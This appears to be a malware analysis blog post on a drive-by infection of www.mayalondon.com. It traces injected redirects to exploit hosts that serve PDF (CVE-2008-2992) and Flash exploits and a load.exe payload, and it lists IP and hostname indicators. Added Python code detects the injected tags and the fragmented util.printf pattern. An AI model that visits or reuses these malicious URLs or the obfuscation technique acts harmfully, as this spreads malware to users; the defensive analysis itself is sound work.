Using Fiddler, I captured the HTTP traffic between my guest systems and the web server. The main page of "www.mayalondon.com" had been injected with malicious links. When a user browses to the infected site, the injected script redirects the browser to:
- http://cbx-north.se/buttons/bothnia.php
- http://bio-age.ru:8080/index.php
A second injected reference, "swfobject.js", contains two further malicious links:
- http://kryolan.com/images/favicon.php
- http://cbx-north.se/buttons/bothnia.php
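As an added example (not code from the original post), this is the check I would run over a page saved from a Fiddler capture to surface injected links like the ones above: every script, iframe, object or embed whose host is not the site's own (or an allow-listed CDN) is reported, and iframes are additionally tagged when they carry the hidden 1x1 styling typical of drive-by injections. The HTML is constructed for the demo; only the two redirect hosts are taken from the post.

```python
"""Added example (not from the original post): flag active-content references
in a captured HTML page that point off-site, which is how the injected links
on www.mayalondon.com show up in a Fiddler capture.  The page below is
constructed for the demo; the two injected hosts are the ones named in the post."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a legitimate page with an injected script tag and a
# hidden 1x1 iframe.  swfobject.js is deliberately a same-site path.
SAMPLE_HTML = """<html><head>
<script src="/js/jquery.js"></script>
<script src="swfobject.js"></script>
<script src="http://bio-age.ru:8080/index.php"></script>
</head><body>
<iframe src="http://cbx-north.se/buttons/bothnia.php" width=1 height=1 style="visibility:hidden"></iframe>
<img src="http://cdn.example-assets.test/logo.png">
</body></html>"""

# Tags that fetch and run or render remote content; <img> is left out on purpose.
ACTIVE_TAGS = {"script": "src", "iframe": "src", "object": "data", "embed": "src"}

class _RefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.refs = []          # (tag, url, attrs)

    def handle_starttag(self, tag, attrs):
        attr = ACTIVE_TAGS.get(tag)
        if attr is None:
            return
        for name, value in attrs:
            if name == attr and value:
                self.refs.append((tag, value, attrs))

def _looks_hidden(attrs):
    """Classic drive-by tells: 0/1-pixel box or hidden via inline style."""
    a = {k.lower(): (v or "") for k, v in attrs}
    style = a.get("style", "").replace(" ", "").lower()
    tiny = (a.get("width", "").rstrip("px") in ("0", "1")
            and a.get("height", "").rstrip("px") in ("0", "1"))
    return tiny or "visibility:hidden" in style or "display:none" in style

def offsite_references(html, page_host, allowed_hosts=()):
    """Return dicts for active-content references whose host is neither the
    page's own host nor an allow-listed CDN.  Relative URLs are same-site."""
    collector = _RefCollector()
    collector.feed(html)
    ok = {page_host.lower(), *(h.lower() for h in allowed_hosts)}
    hits = []
    for tag, url, attrs in collector.refs:
        parts = urlsplit(url)
        if not parts.netloc:
            continue                      # relative path: served by the site itself
        if (parts.hostname or "").lower() in ok:
            continue
        hits.append({"tag": tag, "url": url, "host": parts.netloc,
                     "hidden": _looks_hidden(attrs)})
    return hits

if __name__ == "__main__":
    for hit in offsite_references(SAMPLE_HTML, "www.mayalondon.com"):
        print(hit)
```

Note the limit of the check: the injected "swfobject.js" is served from the compromised site itself, so it is never flagged as off-site; the kryolan.com link inside it only shows up once you fetch that file and read its contents.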
The user is not stopped at one exploit: there is a further exploit chain at "http://cbx-north.se/buttons/bothnia.php" that separately loads an exploit PDF and an exploit Flash file onto the system. Detection rates on VirusTotal for the malicious Flash and PDF files used in this attack are still very low:
- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=2 (PDF) (VT 4/41)
- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=3 (Flash) (VT 2/41)
The script served from "bio-age.ru:8080" is JavaScript that downloads an exploit PDF carrying the Adobe Reader util.printf stack overflow, CVE-2008-2992.
Unsurprisingly, the exploit PDF also received a low detection rate on VirusTotal. The attackers used heavily obfuscated JavaScript combined with script fragmentation to evade detection; I have to salute them for making the analysis hard work.
When opened with an unpatched Adobe Reader, the exploit PDF downloads malware (load.exe) from "http://youbio.ru:8080/main.php?id=5&hello21".
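As an added example (not the post's own code or the captured sample), this is a static triage pass for the kind of PDF described above: it pulls the embedded JavaScript out of the document, undoes the cheap fragmentation tricks (string literals split with "+", API names assembled from variables) and then looks for the CVE-2008-2992 shape, a util.printf call fed a format string with an oversized width specifier. The PDF and its JavaScript are constructed for the demo and carry no exploit; the exact fragmentation style is an assumption about what the obfuscated script looks like, not a copy of the real one.

```python
"""Added example (not part of the original post): static triage of a PDF's
embedded JavaScript for the fragmented util.printf pattern the post describes.
The PDF below is constructed for the demo and carries no exploit; the
fragmentation style and the oversized format width are assumptions about what
the obfuscated script looks like, not a copy of the captured sample."""
import re
import zlib

# Constructed JavaScript: the API name and the format string are split into
# fragments so a naive grep for "util.printf" or "%45000f" misses them.
SAMPLE_JS = b"""var o = "pri"; var n = "ntf";
var fmt = "%4" + "5000f";
var f = util[o + n];
f(fmt, 0xffffffff);
"""

def build_sample_pdf(js):
    """Wrap JavaScript in a minimal PDF: the catalog's /OpenAction points at a
    JavaScript action whose /JS is a FlateDecode stream (constructed input)."""
    stream = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /S /JavaScript /JS 4 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(stream)
        + stream + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for num, body in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"

OBJ_RE = re.compile(rb"(\d+) 0 obj\s*(.*?)\s*endobj", re.S)

def _stream_data(body):
    """Decode an object's stream, slicing exactly /Length bytes so binary data
    is never cut short (assumes a direct /Length, not an indirect reference)."""
    m = re.search(rb"<<(.*?)>>\s*stream\r?\n", body, re.S)
    if not m:
        return None
    length = int(re.search(rb"/Length\s+(\d+)", m.group(1)).group(1))
    data = body[m.end():m.end() + length]
    return zlib.decompress(data) if b"/FlateDecode" in m.group(1) else data

def extract_javascript(pdf):
    """Collect every /JS payload, whether an inline string or a stream object."""
    objs = {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(pdf)}
    scripts = []
    for body in objs.values():
        ref = re.search(rb"/JS\s+(\d+)\s+0\s+R", body)
        if ref:
            data = _stream_data(objs.get(int(ref.group(1)), b""))
            if data is not None:
                scripts.append(data)
        inline = re.search(rb"/JS\s*\((.*?)\)", body, re.S)
        if inline:
            scripts.append(inline.group(1))
    return scripts

_JOIN = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')

def _join_literals(s):
    """Fold "ab" + "cd" into "abcd" until nothing changes."""
    prev = None
    while prev != s:
        prev, s = s, _JOIN.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', s)
    return s

def deobfuscate(js):
    """Cheap normalisation for the fragmentation the post describes: join
    adjacent string literals and inline simple `var x = "...";` definitions.
    A heuristic, not an interpreter; real obfuscators need a JS engine."""
    s = _join_literals(js.decode("latin-1"))
    for name, val in re.findall(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;', s):
        s = re.sub(r"\b%s\b" % re.escape(name), lambda _: '"%s"' % val, s)
    return _join_literals(s)

UTIL_PRINTF = re.compile(r'util\s*(?:\.\s*printf\b|\[\s*"printf"\s*\])')
WIDE_FORMAT = re.compile(r'"%(\d{4,})[\d.]*[a-zA-Z]"')   # width of 4+ digits

def triage_javascript(js):
    """Return findings; both together are the CVE-2008-2992 shape: util.printf
    fed a format string whose width specifier runs to thousands of characters."""
    s = deobfuscate(js)
    findings = []
    if UTIL_PRINTF.search(s):
        findings.append("util.printf referenced")
    m = WIDE_FORMAT.search(s)
    if m:
        findings.append("oversized format width %s" % m.group(1))
    if len(findings) == 2:
        findings.append("CVE-2008-2992 pattern")
    return findings

if __name__ == "__main__":
    for script in extract_javascript(build_sample_pdf(SAMPLE_JS)):
        print(triage_javascript(script))
```

The point of the normalisation step is that the raw stream never contains the strings "util.printf" or "%45000f", which is exactly why signature scanners scored the real sample so low; once the fragments are joined, the call and its oversized width are plain to see. For a real sample, pass the file's bytes to extract_javascript instead of the constructed PDF.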
The hostnames "bio-age.ru:8080" and "youbio.ru:8080" resolve to the same IP address: 208.67.219.132.
"cbx-north.se" resolves to IP address 195.47.247.121.
Other hostnames sharing IP address 195.47.247.121:
1099.se
1jma.net
addison.dk
aid-com.be
amodei.net
andersmagnusson.net
archifacts.net
arerosseland.com
arstahavsbad.net
arubalandscape.net
arvidson.dk
aspdalen.net
betinafriis.net
beyondthenorthwaves.net
bgof.net
birgit-iren.net
bogbasen.dk
bornholmerferier.dk
carloscicchelli.net
casa50.net
cbx-north.se
cdrcrd.com
clubcosmos.net
crispycat.com
cybospace.net
datavagen.com
dbs16.dk
eng-dal.net
faudo.net
ferieitoscana.net
fiberdanmark.dk
fjellhamarfk.net
footballglobe.net
fossekallen.net
fotbollstrojor.net
franzensandberg.net
frodeandersen.net
gizl.nl
glitr.net
gmprod.net
goergen.net
grandiscrew.net
gunmancentral.net
hanekam.net
haraldriise.net
hounds.dk
hsl.be
indelfa.com
innovationmarket.net
insats.net
insg.nl
instituut-waldorf.be
jeromedeperlinghi.net
jhlan.net
jkann.net
jolv.net
ka-kjing.net
kaffesukker.net
kajhelge.net
kloverblomman.net
koksijde.net
kureer.net
kvalitena.net
leeuwerke.net
leksebistand.net
lemuelbooks.net
lifeonacouch.net
lillehammerbaptist.net
loshavnsidene.net
lostinberlin.net
lyd-tekniker.net
mail2.nykroppa.se
malerimetoder.se
memorybar.net
mhastings.net
mitrapa.se
morden.dk
muzinfo.net
nittfors.net
ns2.cdrcrd.com
nykroppa.se
oehlenschlager.dk
ole-andreas.net
olethore.net
oppegaende.net
oshorisk.dk
peture.net
pilegrim.net
problematisk.net
relihq.net
rkcc.dk
roennerhavnen.dk
seules.net
sidenmin.net
sikkerhedsnettet.net
smuthullet.net
spar2design.dk
spd-mv.de
srv71.b-one.net
stromvoll.net
sunile.no
sunnydisposition.net
thaiwok.se
theien.net
theil.dk
tollerforum.net
trikster.net
trim1.net
ultra-ragnar.net
usenethelp.net
vinnpenger.net
voldesign.net
webbkampanj.net
wickedfriends.net
www.bornholmerferier.dk
www.malerimetoder.se
www.mitrapa.se
www.pirken.dk
www.sunile.no
www.thaiwok.se
xweza.com
zirconium-inc.net
Hostnames on IP address 208.67.219.132:
bio-age.ru:8080
youbio.ru:8080
goowy.net
iris-germany.com
quienestadetrasdelascuarderias.org
Hostnames on IP address 78.46.45.77 (kryolan.com):
*.bestensee.de
*.kryolan.com
*.omatix.de
bestensee.de
cydico.com
dermacolor-camouflage.net
gut.de
haby.net
kryolan.us
kryolan.com
linear-software.de
lwb-info.de
omatix.de
rbo-info.de
s10.omatix.de
static.77.45.46.78.clients.your-server.de
www.bestensee.de
www.kryolan.de
www.omatix.de
P/S: The webmaster of "www.mayalondon.com" has suspended the website for maintenance to clean up the malicious code.